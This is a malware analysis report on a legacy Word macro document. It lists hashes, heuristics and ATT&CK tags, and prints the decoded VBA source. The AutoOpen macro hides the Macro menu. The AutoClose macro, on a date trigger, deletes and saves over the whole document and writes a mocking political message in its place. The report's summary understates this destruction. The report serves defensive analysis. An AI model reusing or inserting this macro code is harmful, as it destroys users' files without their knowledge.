Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c097bec58ef9add0…

MALICIOUS

Office (OLE)

43.0 KB Created: 2000-11-21 19:32:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c9cf4d6054349ae42681416219de1d8b SHA-1: 3db8a692a6d4a3dce90c5697586e5d06d437d70c SHA-256: c097bec58ef9add0959ec77504bd194fc444f3a5b2ed1c17b0d09e1407709872
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically triggering AutoOpen and AutoClose events. The AutoClose macro contains text that appears to be a political statement and potentially a lure or distraction, but the presence of AutoOpen and AutoClose macros indicates an attempt to execute code upon document interaction. The macros themselves do not appear to download further payloads but modify the document content in a non-standard way.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1847 bytes
SHA-256: 251d3d2b931277101080706d41a5b1e4a98a56890a4fb61c50c6ba504542dd17
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "AutoOpen"
Public Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Abre un documento de Microsoft Word"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.AutoOpen"
'
' AutoOpen Macro
' Abre un documento de Microsoft Word
'
CommandBars("Tools").Controls("Macro").Visible = False

End Sub

Attribute VB_Name = "AutoClose"
Public Sub AutoClose()
Attribute AutoClose.VB_Description = "Cierra el documento activo de Microsoft Word"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.AutoClose"
'
' AutoClose Macro
' Cierra el documento activo de Microsoft Word
'

If WordBasic.Day(WordBasic.Now()) > 1 And WordBasic.Month(WordBasic.Now()) > 11 Then

    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.ColorIndex = wdRed
    Selection.Font.Name = "Arial"
    Selection.Font.Name = "Arial"
    Selection.Font.Size = 36
    Selection.TypeText Text:="VICENTE FOX!!!!"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.Font.ColorIndex = wdBlack
    Selection.Font.Size = 24
    Selection.TypeText Text:="Ahora si ya te cargo la chingada!!!"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="Si al IVA en Alimentos y Medicinas!!!"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.TypeText Text:="ja,ja,ja,ja,ja,ja..."
    ActiveDocument.Save
    Application.Quit
End If
End Sub